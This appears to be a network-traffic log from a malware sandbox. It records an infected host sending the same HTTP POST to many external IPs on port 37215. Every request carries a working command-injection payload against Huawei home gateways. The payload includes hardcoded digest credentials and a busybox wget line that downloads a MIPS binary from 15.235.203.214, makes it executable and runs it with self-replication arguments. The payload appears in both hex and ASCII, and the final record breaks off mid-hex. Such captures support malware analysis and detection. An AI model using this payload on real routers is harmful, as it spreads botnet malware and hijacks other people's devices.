                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      43192.168.2.233782641.76.26.4337215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221549988 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      44192.168.2.2341818207.93.222.1337215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221549988 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      45192.168.2.2343680157.254.68.19037215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221556902 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      46192.168.2.2333418197.127.202.24937215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221564054 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      47192.168.2.2335138197.213.7.23837215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221582890 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      48192.168.2.2344458157.170.128.937215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221582890 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      49192.168.2.2343176157.215.252.137215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221570015 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      50192.168.2.234257441.240.149.12937215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221570015 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      51192.168.2.2353302157.143.196.12037215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221570015 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      52192.168.2.2356366197.221.173.15137215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221623898 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 